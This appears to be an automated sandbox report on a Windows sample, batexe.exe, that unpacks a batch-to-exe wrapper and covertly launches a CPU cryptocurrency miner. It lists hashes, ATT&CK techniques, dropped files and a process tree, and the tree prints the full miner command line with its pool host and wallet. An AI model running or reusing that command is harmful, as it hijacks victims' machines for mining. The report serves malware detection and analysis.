73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13-02-2024 23:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
4756	b2e.exe
4208	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4208	cpuminer-sse2.exe
4208	cpuminer-sse2.exe
4208	cpuminer-sse2.exe
4208	cpuminer-sse2.exe
4208	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/732-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 732 wrote to memory of 4756	732	batexe.exe	85
PID 732 wrote to memory of 4756	732	batexe.exe	85
PID 732 wrote to memory of 4756	732	batexe.exe	85
PID 4756 wrote to memory of 1884	4756	b2e.exe	87
PID 4756 wrote to memory of 1884	4756	b2e.exe	87
PID 4756 wrote to memory of 1884	4756	b2e.exe	87
PID 1884 wrote to memory of 4208	1884	cmd.exe	89
PID 1884 wrote to memory of 4208	1884	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:732
- C:\Users\Admin\AppData\Local\Temp\6DDD.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6DDD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6DDD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\707D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1884
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6DDD.tmp\b2e.exe

Filesize
2.7MB

MD5
18932d8dabf81ac77f9aa89175e89237

SHA1
a1b1082acb6811daaa4145378b721bd842b9bf5b

SHA256
e9533957bc6eb97f59bad7e6f25a174305a436a16e36cf71f4ee724614b4b830

SHA512
07f7535423f386e645eb5e9c501f0a74dc2fe29752f671cfcf327ad9193aa9484981fab516876da4af600f65f93c438dfc2d99df936df75233145f4b0e9d297a

Download Submit
C:\Users\Admin\AppData\Local\Temp\6DDD.tmp\b2e.exe

Filesize
1.8MB

MD5
ae2e6413a357099eeaf5b5eca8e46b7d

SHA1
089ed9d847f124be0259536b07d0cd5f086bd400

SHA256
e5845480988c51ef66ae773d19b414e7aa4e3cdeeb839dd2179f9f14f00b6cf5

SHA512
be0190cbd2e3100b5997aa71f18904fb66211ac85377a426aeaaa208c6482b2faf3a8cc45a1fdb2dee134aeb2e4764f32adc789359619f9bff00cc9ad4148435

Download Submit
C:\Users\Admin\AppData\Local\Temp\6DDD.tmp\b2e.exe

Filesize
1.7MB

MD5
26c7b6d5ada374ef1809d6a0e175c55d

SHA1
9b17d308ac4eee43462a7f7b7b9b44f6f2510404

SHA256
94ae4a56a9896e354ae4f5b49a1e84e331f07bfc8953dadf47c9972a1333066b

SHA512
6c3f1d8eb385f61e9883f44e967c32974390dae382001f839288c6cb67fe1dff6e5730622d8bed0b611421248624926cc7b456baa3bde32c2c64196682824dde

Download Submit
C:\Users\Admin\AppData\Local\Temp\707D.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
253KB

MD5
ba8af2e896e1db607732148a0febbedc

SHA1
01d96d3822b268e627c2556d2dc2e9c371b3fa5a

SHA256
4c48279e6cde837e72bb94ecd142e95e7592700b19b0bf9f127cf4e64f3d4daf

SHA512
7f2dd303bf0ebbfac4b937bf3e3e7e1212d265e13f0bd9cae1c8a1c112f655626fa54cada2684591f735b18960ca82564714e55f0acc855183d5a2b54b8e323e

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
416KB

MD5
5be3b4aaa55a602939036b5068fc4cfa

SHA1
c3c056b4bc9e9d8fdd346c49fa018e6e3fd4c4da

SHA256
89a62db1ba67c27dd0430f01510aabf511cc7b42bd71e92ac2588d945dab96f8

SHA512
4481f87018c907539f35b2349d3551089cbb1b5ae9ada80294ec2a4cfb997b862d77a19c1c2b37094eed05de8a59a5fad31c57e6a2ff884974218774d389082d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
344KB

MD5
3a0981e3cb2d1af473d7bb6480e80607

SHA1
3a297079f65e11bc496d93b9c37ebe6a48446b4b

SHA256
e2775cb89596413a031d6de8611b952efd00e9beba591a7601744eea0d1541e8

SHA512
7326d60dc690f0065ded419a7b7a9c6f87941c85901a08ec4168d0d0df301b42ebd717ea63952e1e3aa5f84a13fae781076e196b4956a387672fe05723ec621a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
475KB

MD5
c9da64488ecd946890a0d2ad4a8fe95f

SHA1
d699fd1fb174a809ce448fec2ecaa3c42e94c227

SHA256
54ad82a6311754ff365616c3738b3353c463f2f8bfe36346e039d9d2ceba575a

SHA512
ee10738ddce3757c5ca71e17e64a1bc7ff17edb6ab2a2fc2750e6c1d0ec011d9cbdff03d8c811bbd69cd6c0f426735d155d7a478d4514962bb5db3cf37c8fe49

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
240KB

MD5
999400466387129c7d7d541c465116f5

SHA1
283e5695d0813b581fee0fd8d64b6b0db712ac9e

SHA256
21414935e7ef56f2c9b274f14fc7d683921677a447168babf7acd909f513420d

SHA512
80b41d697208077d7d022fd46c8b1c92ed02644d6e039de5f4a7ee80d28bed41c086f330d6e1e4a56f3b29e2d9fced0d0219d3298639ee53f9fa2670dfa524b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
178KB

MD5
95a72289a277aa70d8c8c47d992bcc99

SHA1
6341a860c047f173f8dc8e6db3ea8f8aff14353e

SHA256
c5902424ef34f95092530514a6c7aac91b885e35ea4df7d074419bd48053df78

SHA512
f6fa9d69f86937c2fa88ffd3b3f4a351b4c42aa51226ce3b972e83a289b03394bfa904ecd6bb26500e52d09e811e1ab09a7ac4cab3f6457dd49c43842bda6c39

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
350KB

MD5
8d6797fc99f4b5ab159108e2230f1730

SHA1
53aa583337576e7020570f92ddae637db74a5a67

SHA256
fc9814e61303128647795a1bb38b79134d6c5af52ebdc0f9621cb3dcb241abf9

SHA512
81b4c86a63c98d588be9c53a37d7a93149dd983ac2b471f057b5ed544e31be4b9c299ba89cbd2eb76b322753f8c57c519b9f66bad9f28eaf07ecf5d6f5237859

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
356KB

MD5
2d9b41cbc8f33c6cb6bee85e1992b54a

SHA1
9bdab75299ee8052d53df6d61f932f17838d7f28

SHA256
3f387c3e11a33ef0e365023b14037a33339adde13f4d32fd24583156d99db6c6

SHA512
cd8f52491dd13009f8b7235df00936a74ce803271ffa592d14552c26fe27aaebeb045a548382d60fd045e8c405f9bb8ab815197c6e126965b1e48de13ae70f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
276KB

MD5
854e115b5c01f526cb5ff45c08ba41ab

SHA1
4d801ff5cdcc8725bccd2a5a3fb433e349194d9d

SHA256
66f9628ade33530ccb31c7bc0b6dc70eeee4529923287f51343a11117d883c5a

SHA512
a9d213bc62800095c94cb9a29b47647c570f79b460db545dfad0b40c337fcf600554b0d97255989346aa1921d0a8bdab210e6483c78968549a405f00c8979b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
431KB

MD5
c8f8e8fa7e50a1582c0030517749d264

SHA1
02c54460df1c192e1e8654c5229e1d5904cbf1f0

SHA256
92749bb4f5e97966d4f30ddc637ef8636d7449a483a2c6492ad83791053b386b

SHA512
cd1a36cbfb8a13e8809a17610f446339a777566904954dc1488578bfb59af468df7699f9ca8cee57f80381c971456f3844b3478afe3bce3f0841ea79fd19146e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
192KB

MD5
625f906456510afaf916dd0384d76eee

SHA1
66c56574aff02fb199caa60ab71ca9f1c9e7fc92

SHA256
27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

SHA512
041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

Download Submit
memory/732-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4208-47-0x0000000001050000-0x0000000002905000-memory.dmp

Filesize
24.7MB

Download
memory/4208-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4208-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-46-0x0000000074D80000-0x0000000074E18000-memory.dmp

Filesize
608KB

Download
memory/4208-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4208-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4208-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4756-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4756-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download